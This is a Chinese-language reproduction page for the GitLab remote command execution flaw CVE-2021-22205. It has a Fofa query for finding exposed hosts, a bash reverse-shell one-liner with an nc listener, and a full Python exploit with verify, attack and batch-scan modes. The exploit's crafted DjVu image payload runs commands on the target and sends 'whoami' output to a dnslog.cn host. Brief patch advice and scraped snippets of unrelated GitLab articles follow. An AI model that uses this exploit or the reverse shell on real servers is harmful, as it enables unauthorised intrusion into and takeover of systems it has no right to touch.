关键词:
Vuln Impact
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
影响版本
- Gitlab CE/EE < 13.10.3
- Gitlab CE/EE < 13.9.6
- Gitlab CE/EE < 13.8.8
环境
export GITLAB_HOME=/srv/gitlab
sudo docker run --detach \\
--hostname gitlab.example.com \\
--publish 443:443 --publish 80:80 \\
--name gitlab \\
--restart always \\
--volume $GITLAB_HOME/config:/etc/gitlab \\
--volume $GITLAB_HOME/logs:/var/log/gitlab \\
--volume $GITLAB_HOME/data:/var/opt/gitlab \\
gitlab/gitlab-ce:13.9.1-ce.0
Fofa语法
title="GitLab" && country="CN"
漏洞利用脚本
https://github.com/Al1ex/CVE-2021-22205
反弹Shell
如果目标主机出网的话,可以尝试反弹Shell
使用linux命令反弹shell
bash -i >& /dev/tcp/ip/port 0>&1
nc监听10000端口
nc -lvp 10000
成功上线
执行命令RCE
Exp
import requests
from bs4 import BeautifulSoup
import base64
import random
import sys
import os
import argparse
requests.packages.urllib3.disable_warnings()
def title():
print("""
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\\ \\ / / ____| |___ \\ / _ \\___ \\/ | |___ \\|___ \\|___ \\ / _ \\| ___|
| | \\ \\ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \\
| |___ \\ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\\____ | \\_/ |_____| |_____|\\___/_____|_| |_____|_____|_____|\\___/|____/
Author:Al1ex@Heptagram
Github:https://github.com/Al1ex
""")
print('''
验证模式:python CVE-2021-22205.py -v true -t target_url
攻击模式:python CVE-2021-22205.py -a true -t target_url -c command
批量检测:python CVE-2021-22205.py -s true -f file
''')
def check(target_url):
session = requests.Session()
try:
req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False)
soup = BeautifulSoup(req1.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
data = "\\r\\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\\r\\nContent-Disposition: form-data; name=\\"file\\"; filename=\\"test.jpg\\"\\r\\nContent-Type: image/jpeg\\r\\n\\r\\nAT&TFORM\\x00\\x00\\x03\\xafDJVMDIRM\\x00\\x00\\x00.\\x81\\x00\\x02\\x00\\x00\\x00F\\x00\\x00\\x00\\xac\\xff\\xff\\xde\\xbf\\x99 !\\xc8\\x91N\\xeb\\x0c\\x07\\x1f\\xd2\\xda\\x88\\xe8k\\xe6D\\x0f,q\\x02\\xeeI\\xd3n\\x95\\xbd\\xa2\\xc3\\"?FORM\\x00\\x00\\x00^DJVUINFO\\x00\\x00\\x00\\n\\x00\\x08\\x00\\x08\\x18\\x00d\\x00\\x16\\x00INCL\\x00\\x00\\x00\\x0fshared_anno.iff\\x00BG44\\x00\\x00\\x00\\x11\\x00J\\x01\\x02\\x00\\x08\\x00\\x08\\x8a\\xe6\\xe1\\xb17\\xd9*\\x89\\x00BG44\\x00\\x00\\x00\\x04\\x01\\x0f\\xf9\\x9fBG44\\x00\\x00\\x00\\x02\\x02\\nFORM\\x00\\x00\\x03\\x07DJVIANTa\\x00\\x00\\x01P(metadata\\n\\t(Copyright \\"\\\\\\n\\" . qxcurl `whoami`.82sm53.dnslog.cn . \\\\\\n\\" b \\") ) \\n\\r\\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\\r\\n\\r\\n"
headers =
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Connection": "close",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
"X-CSRF-Token": f"token", "Accept-Encoding": "gzip, deflate"
flag = 'Failed to process image'
req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
if flag in req2.text:
print("[+] 目标 存在漏洞".format(target_url))
else:
print("[-] 目标 不存在漏洞".format(target_url))
except Exception as e:
print(e)
def attack(target_url,command):
session = requests.Session()
try:
req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False)
soup = BeautifulSoup(req1.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
data = "\\r\\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\\r\\nContent-Disposition: form-data; name=\\"file\\"; filename=\\"test.jpg\\"\\r\\nContent-Type: image/jpeg\\r\\n\\r\\nAT&TFORM\\x00\\x00\\x03\\xafDJVMDIRM\\x00\\x00\\x00.\\x81\\x00\\x02\\x00\\x00\\x00F\\x00\\x00\\x00\\xac\\xff\\xff\\xde\\xbf\\x99 !\\xc8\\x91N\\xeb\\x0c\\x07\\x1f\\xd2\\xda\\x88\\xe8k\\xe6D\\x0f,q\\x02\\xeeI\\xd3n\\x95\\xbd\\xa2\\xc3\\"?FORM\\x00\\x00\\x00^DJVUINFO\\x00\\x00\\x00\\n\\x00\\x08\\x00\\x08\\x18\\x00d\\x00\\x16\\x00INCL\\x00\\x00\\x00\\x0fshared_anno.iff\\x00BG44\\x00\\x00\\x00\\x11\\x00J\\x01\\x02\\x00\\x08\\x00\\x08\\x8a\\xe6\\xe1\\xb17\\xd9*\\x89\\x00BG44\\x00\\x00\\x00\\x04\\x01\\x0f\\xf9\\x9fBG44\\x00\\x00\\x00\\x02\\x02\\nFORM\\x00\\x00\\x03\\x07DJVIANTa\\x00\\x00\\x01P(metadata\\n\\t(Copyright \\"\\\\\\n\\" . qx"+ command +" . \\\\\\n\\" b \\") ) \\n\\r\\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\\r\\n\\r\\n"
headers =
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Connection": "close",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
"X-CSRF-Token": f"token", "Accept-Encoding": "gzip, deflate"
flag = 'Failed to process image'
req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
if flag in req2.text:
print("[+] 目标 存在漏洞".format(target_url))
print("[+] 请到dnslog或主机检查执行结果")
else:
print("[-] 目标 不存在漏洞".format(target_url))
except Exception as e:
print(e)
def scan(file):
for url_link in open(file, 'r', encoding='utf-8'):
if url_link.strip() != '':
url_path = format_url(url_link.strip())
check(url_path)
def format_url(url):
try:
if url[:4] != "http":
url = "https://" + url
url = url.strip()
return url
except Exception as e:
print('URL 错误 0'.format(url))
def main():
parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
parser.add_argument('-v', '--verify', type=bool,help=' 验证模式 ')
parser.add_argument('-t', '--target', type=str, help=' 目标URL ')
parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ')
parser.add_argument('-c', '--command', type=str, help=' 执行命令 ')
parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')
args = parser.parse_args()
verify_model = args.verify
target_url = args.target
attack_model = args.attack
command = args.command
scan_model = args.scan
file = args.file
if verify_model is True and target_url !=None:
check(target_url)
elif attack_model is True and target_url != None and command != None:
attack(target_url,command)
elif scan_model is True and file != None:
scan(file)
else:
sys.exit(0)
if __name__ == '__main__':
title()
main()
漏洞防范及修复
官方修复
目前官方已发布新版本修复了该漏洞,请受影响的用户尽快升级至最新版本进行防护,官方下载链接:
https://about.gitlab.com/update/
临时防护措施
使用白名单限制对Web端口的访问
gitlab无需认证rce漏洞复现(cve-2021-22205)(代码片段)
文章目录gitlab介绍漏洞介绍漏洞编号漏洞等级影响版本FOFA查询环境搭建(vulhub环境搭建)漏洞复现第一步漏洞检测第二步dnslog解析第三步服务器写入文件第三步反弹shell修复建议免责声明摘抄gitlab介绍GitLab是美国GitLab公... 查看详情
gitlab无需认证rce漏洞复现(cve-2021-22205)(代码片段)
文章目录gitlab介绍漏洞介绍漏洞编号漏洞等级影响版本FOFA查询环境搭建(vulhub环境搭建)漏洞复现第一步漏洞检测第二步dnslog解析第三步服务器写入文件第三步反弹shell修复建议免责声明摘抄gitlab介绍GitLab是美国GitLab公... 查看详情
速度超过1tbps,gitlab服务器被利用发起ddos攻击
据外媒报道,GitLab服务器被攻击者利用发起DDos攻击,攻击速度甚至超过了每秒1TB(Tbps)。谷歌DDos防御团队成员,云安全工程师DamianMenscher披露了此次攻击细节,发起者利用GitLab曾在今年4月修复的CVE-2021-222... 查看详情
GitLab fork 远程公共仓库
】GitLabfork远程公共仓库【英文标题】:GitLabforkremotepublicrepo【发布时间】:2015-03-1905:56:11【问题描述】:我的组织有一台专门用于安装GitLab的机器。我经常与其他公共项目(Drupal.org和Github)合作。除了拥有我们自己的开发和生... 查看详情
gitlab--基本操作
1、基本项目中gitlab操作: 首先fork下项目,将项目devlopfrok到自己的仓库。 克隆自己远程项目:git clone+自己的远程项目地址。 建立自己的远程仓库:gitremote-v (查看远程分支),gitremoteadd+地址,gitremoterm删除远... 查看详情
git连接gitlab远程仓库
...目仓库,现在互联网上有很多项目托管平台,比如github、gitlab等。为了不公开自己项目代码,可以在自己的服务器上搭建自己的项目仓库,最常见的是搭建GitLab。本地Git与远端服务器GitLab之间连接方式主要分为:SSH方式和HTTP方... 查看详情
gitlab远程备份
===============================================20171015_第1次修改 c 查看详情
从 Jenkins 远程签入到 GitLab
】从Jenkins远程签入到GitLab【英文标题】:Remotecheck-intoGitLabfromJenkins【发布时间】:2020-01-3016:07:52【问题描述】:要求:我有一个Java项目,它读取excel并在验证后更新相同的excel。在构建运行中,这一切都会发生。现在,我必须使... 查看详情
gitlab本地推送到远程仓库的命令
如果gitremoteaddorigin时提示说在远程仓库有origin了,可以选择gitremotermorigin或者换个其他任意的字符串。 查看详情
从 gitlab 克隆 repo 的问题(致命:远程端意外挂断)
】从gitlab克隆repo的问题(致命:远程端意外挂断)【英文标题】:Issuewithcloningrepofromgitlab(fatal:Theremoteendhungupunexpectedly)【发布时间】:2013-07-3112:26:57【问题描述】:制作时:sudogitclonegit@gitlab.mydomain.com:ws.git我收到一个错误:>su... 查看详情
GitLab:远程访问被拒绝致命 - 身份验证失败
】GitLab:远程访问被拒绝致命-身份验证失败【英文标题】:GitLab:Remoteaccessdeniedfatal-authenticationfailed【发布时间】:2019-03-2617:22:13【问题描述】:昨天我在编码,当我提交到一个仓库时,我不能这样做,因为gitlab给我发了两条消... 查看详情
如何修改gitlab上项目的远程地址
参考技术A一、修改gitlab上项目的远程地址1、找到该项目,点击settings选择Advancedsettings,改变项目名称和地址改完之后,点击renameproject就ok了二、修改本地项目的remote地址1、打开Terminal(终端)2、进入该项目3、用gitremote-v列出现... 查看详情
无法将 git 分支重命名为“master”,以错误的名称推送到远程
】无法将git分支重命名为“master”,以错误的名称推送到远程【英文标题】:Unabletorenamegitbranchto"master",pushestoremotewithincorrectname【发布时间】:2016-09-1205:50:41【问题描述】:使用thisSO帖子作为参考,我能够将我的master重命... 查看详情
远程gitlab新建的分支在idea里不显示
...所有本地分支和远程分支gitbranch-r:只查看远程分支如果gitlab里有,而本地没有,则执行gitfetch就可以更新到了。然后,在idea里就可以看到所有的远程分支了(不用重启idea)。 查看详情
gitlab远程仓库迁移
GitLab上的项目迁移,实质上是更改远程仓库的url。我们在同一个用户下面迁移项目的时候可以更改项目的"projectname"来实现项目的迁移。但当用户A的项目迁移到用户B的时候,可以在用户B下面新建一个项目,然后把项目A的文... 查看详情
通过ssh克隆远程仓库(gitlab)到本地
...1.首先需要下载一个gitforwindows,成功安装。2.在github或者gitlab上有自己的账户。3.打开gitbash.exe 输入ssh-keygen-trsa-C"[email 查看详情
gitlab代码备份(代码片段)
gitlab机器编写sh[[email protected]~]#vimauto_backup_to_remote.shLocalBackDir=/var/opt/gitlab/backups#gitlab备份文件目录RemoteBackDir=/root/gitlab_backup#远程的备份目录RemoteUser=root#远程服务器用户RemotePort=22#远程服务器端口R 查看详情
如何利用gitlab-ci持续部署到远程机器?(代码片段)
长话短说,今天聊一聊使用Gitlab-CI自动部署到远程服务器。如果看过《》这篇文章的朋友,会注意到我是在Gitlab-Runner服务器上自动部署的站点,本次我们结合ssh部署到远程机器(将CI服务器和部署服务器分离,避免资源抢占)。SS... 查看详情